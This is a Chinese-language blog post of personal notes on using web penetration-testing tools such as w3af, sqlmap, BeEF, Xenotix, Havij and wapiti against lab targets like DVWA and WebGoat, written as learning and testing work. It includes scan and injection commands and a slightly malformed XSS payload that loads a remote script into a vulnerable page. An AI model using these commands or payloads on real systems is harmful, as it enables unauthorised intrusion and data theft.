常用渗透测试工具使用tips

前几日,对常用的渗透测试工具摸了一把,主要是针对sql注入和XSS,抓了些包,现在把常用渗透测试工具使用时候的应该注意的东东记录了下来,年纪大了,不写容易忘~

欢迎大家指正~

                                                                                                          常用渗透测试工具使用tips

                                                                                                                                                                       ---by  yd0str

1. BT5 VM版本
    在/pentest/web下面,常用penetration test工具
    综合测试攻击
  (1) w3af (抓了些包,看着效果不好) 
    (这个配置也非常的恶心,尤其是表单认证内容,拿DVWA做测试,web.spider爬取的内容有问题,全站爬取,不会从指定起始页码爬起)
     下面是表单认证的具体步骤:
        1 auth--detailed
             username:admin
             password:admin
             method:POST
             auth_url:http://192.168.184.141/dvwa/login.php
             username_field:user (这两个地方填错了多次,因为表单那个地方的name有几处,还是有待进一步注意)
             password_field:pass
             check_url:http://192.168.184.141/dvwa/index.php
             check_string:admin
             data_format:username=%U&password=%P&Login=Login
        这时候如果只选中auth这个认证,然后web.spider,会提示登陆是否正确
        (https://www.owasp.org/index.php/Automated_Audit_using_W3AF
          http://w3af.org/howtos/authenticated-scans
           http://www.91ri.org/5782.html
           http://www.91ri.org/3117.html)
             
   (2) burpsuite(这个也有单独版本,如果觉得BT下不好使,可以单独使用)
        本身不属于渗透测试工具,但是可以结合别的工具使用,这里抓了暴力破解用户名密码的包
   
   (3)skipfish(名人所写,但是据说效果不是很好)
       下面这个是用skipfish扫描dvwa的过程,但是好像是全站爬取,量太大,就暂停了扫描,效果不好
       ./skipfish -o dvwa -C "security=high; PHPSESSID=taj2jhiqba3j0fs50pa7f1rb20" -S "dictionaries/complete.wl" -W "dictionaries/webgoat.wl" http://192.168.184.141/dvwa/vulnerabilities/
       
   (4)zap(暂时没有测试,国外黑客对这个也比较有兴趣,也是常用的工具)


       
       经典XSS攻击平台
  (5)xsser(http://www.91ri.org/2740.html) 注入工具大都是针对有参数的URL
       这个是针对带有参数的,要看代码
    
  (6)beef  (抓了包,从包上看是带有beef指纹的,但是内容是加密的,具体的原理要看代码才能知道了https://github.com/beefproject/beef)
        BT5下的打不开,出错
      直接运行BT5下面的beef报错如下:、
          /root/beef/core/loader.rb:18:in `require': no such file to load -- bundler/setup (LoadError)

         from /root/beef/core/loader.rb:18:in `<top (required)>'

        from ./beef:42:in `require'

        from ./beef:42:in `<main>'
   上网找了一下,发现是环境变量的原因。
   用如下方法再次安装bundler
      gem install -–user-install bundler
   此时刻运行,还是会报一个错,为
      root@bt:/pentest/web/beef# ./beef 
     Could not find gem 'eventmachine (= 0.12.10) ruby' in the gems available on this machine.
     Run `bundle install` to install missing gems.
  然后继续运行:bundle install
  然后在执行beef
 
 (http://m.blog.csdn.net/blog/xihuanqiqi/17091067 攻略,很详细,xsser.me for SAE)
 
   
  (7)sqlmap(python脚本学习下)
   经典sql注入工具
   (这种针对参数的工具,不知道是不是扫描方式有问题,还是怎么着,怎么才能抓几个包,或者把常用点的包抓出来)
   抓几个sqlmap的包
   sqlmap功能很强大,这里就抓了一个结合burpsuite POST sqlmap的包(也可以用Burpsuite sqlmap插件http://www.freebuf.com/tools/6426.html)
   命令:   
   1. 先用burpsuite 拦截一个网站(包里用的是wvs的测试网站http://testasp.vulnweb.com/Login.asp)的post请求,然后将这个请求存下来,比如保存为burpsuite_sql_post.txt   
   2. sqlmap.py -r "burpsuite_sql_post.txt" -p tfUName(或者tfUPass)




综合扫描系列


2. wvs  (192.168.184.135)
   WVS(Web Vulnerability Scanner)是一个自动化的Web应用程序安全测试工具,它可以扫描任何可通过Web浏览器访问的和遵循
       如果在windows下用wireshark抓包,记得用命令形式
       如:tshark -D (找出网卡)
           tshark -i 网卡号 -b filesize:10240(10M) -w "xxxxx.pcap"  以10M一个包保存,还有其他功能,比如根据时间,存几个包,可以参考命令说明
       这个包存了一大批(4,500)                 

3. nessus 4.x(5.x版本不好用) (192.168.184.135)
   Nessus 开源漏洞扫描与分析软件。
   账户名密码:xxxx,xxxxx
   这个扫描需要登录验证的页面,比较复杂,参考这个链接,但是效果不好
   https://www.owasp.org/images/4/4f/Web_Application_Vul_Testing_with_Nessus_2012.02.01.pdf
   抓出来3个包
   从包中来看,应该是能登录进去的,但是后面的链接爬取好像有问题,效果不太好
   
   
4. WebCruiserEnt          (已经抓包,还有log 192.168.184.130)
   Web安全扫描工具WebCruiser - Web Vulnerability Scanner
   Web应用漏洞扫描器,能够对整个网站进行漏洞扫描,并能够对发现的漏洞(SQL注入,跨站脚本,XPath注入等)进行验证;它也可以单独进行漏洞验证,作为SQL注入工具、XPath注入工具、跨站检测工具使用

5. appscan  不好配置,webgoat虚拟下容易被打挂,需要经常重启,所以先抓了一个大概的包,payload信息应该是全的
            配置的时候需要记得登录验证的地方(192.168.184.135)
            http://public.dhe.ibm.com/software/dw/cn/demos/rIntroToAppScan/rIntroToAppScan.pdf
            http://www.nxadmin.com/tools/675.html
            http://www.360doc.com/content/11/0831/10/284310_144677089.shtml


6. safe3wvs  抓了一个,包的数量不多,扫webgoat有几个漏洞(192.168.184.135)
             这个扫描之前,需要注意输入验证用户名密码的输入,还有cookie的输入,这个地方用temper data 截取了cookie放在了这里
             才能扫出结果


   
SQL注入,XSS专业平台


7. Xenotix XSS Exploit Framework V4         (已经抓包,需要写个使用文档,在宿主机本机上)
   owasp出品,检测和利用WEB应用程序中的XSS漏洞的渗透测试工具。这个工具可以将代码注入到含有xss漏洞的web页面中
   注意事项:先配置服务端,就是一个本地的IP,比如4.5版本的会默认的127.0.0.1:5050
   这个地方是为了配置一个动态的脚本,该脚本在该框架中的用处我们下边会进行介绍(youtube上有视频)
   1. 首先利用该框架,对victim(受害者)网站进行url的注入扫描,就是对参数进行攻击串的扫描,如果哪个浏览器框架会体现出存在的XSS点,就会弹弹弹
      这一部分其中是用不到开始配置的那个本地服务的js脚本的
   2. 如果有个地方经过上面或者其他方式验证,存在XSS点,那么就可以插入本地这个配置的脚本了,比如
      存在XSS点为http://192.168.184.135/aa.php?id=1
      如果这个id参数存在XSS威胁,那么可以就是这么插入
      http://192.168.184.135/aa.php?id=1<script>127.0.0.1:5050/xss.js</script>
      这样就可以利用该框架的包括一些命令执行的功能了,相当于让远程victim网站加载了本地的JS脚本,进行语句执行


8. Havij  (已经抓包,还有log 192.168.184.130)
   Havij是一款自动化的SQL注入工具  
   (这种工具主要用来配合综合扫描工具(比如经典的配合safe3wvs,然后在配合旁注工具,找到后台,然后用该工具跑出的用户名密码进行登录后台),
   或者对可疑注入点进行注入使用)
   但是对dvwa的注入点进行扫描的时候,没有找到注入点


9. wapiti  (python脚本学习下)(已经抓包,还有log 192.168.184.130)
   sql注入工具
   工具3.x版本是个exe,看不到py,可以看看原始的python脚本
   这是一个轻量级的web扫描工具,具说可以识别文件处理错误、SQL、LDAP 及 CRLF 类注入攻击,跨站脚本攻击、检查潜在的命令执行。wapiti 是由 python 语言开发的,因此支持的平台也很广泛,安装 python vm 是可以了
   1.通过扫描dvwa来看,效果不好,
   (1)(有登陆,首先进行获取cookie值,该软件自带一个获取cookie的工具,存成json形式,这个跟以前的版本不太一致)
   C:\xxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti-getcookie.exe cookie.json http://192.168.184.141/dvwa/
   
   (2)带着cookie去扫描,-s的内容好像是可能起始页,从包上来看,可以在该目录下遍历
   C:\dd\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exe "http://192.168.184.141/dvwa/" -c cookie.json -s "http://192.168.184.141/dvwa/vulnerabilities/"
   
   (3)从攻击包分析看,是对链接拼接了一些串,(http://lzy.iteye.com/blog/338178 说不像 nikto 提供测试用例库,而是实现了内置的匹配算法)
        但从包上看,大概是一些关键的字符串,具体的所谓的匹配算法还要去看py脚本内容
   (4)如果输入的url不带参数,就是直接在url后拼接,如果带参数输入命令的话,可以在参数后进行跑
    C:\dd\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exe "http://192.168.184.141/dvwa/" -c cookie.json -s "http://192.168.184.141/dvwa/vulnerabilities/sqli/?id="
    总体效果不好,没有找到漏洞点,反而找到了一个login.php的 SQL 注入
    
    扫描testfire效果好些还可以
    C:\xxxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti-getcookie.exe cookie.json http://demo.testfire.net/bank/login.aspx
    C:\xxx\software\wapiti-2.3.0-win32-standalone\wapiti-2.3.0-win32-standalone>wapiti.exe http://demo.testfire.net/  -c cookie.json -x http://demo.testfire.net/bank/logout.aspx
10. pangolin(没测)
   穿山甲,注入攻击
 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值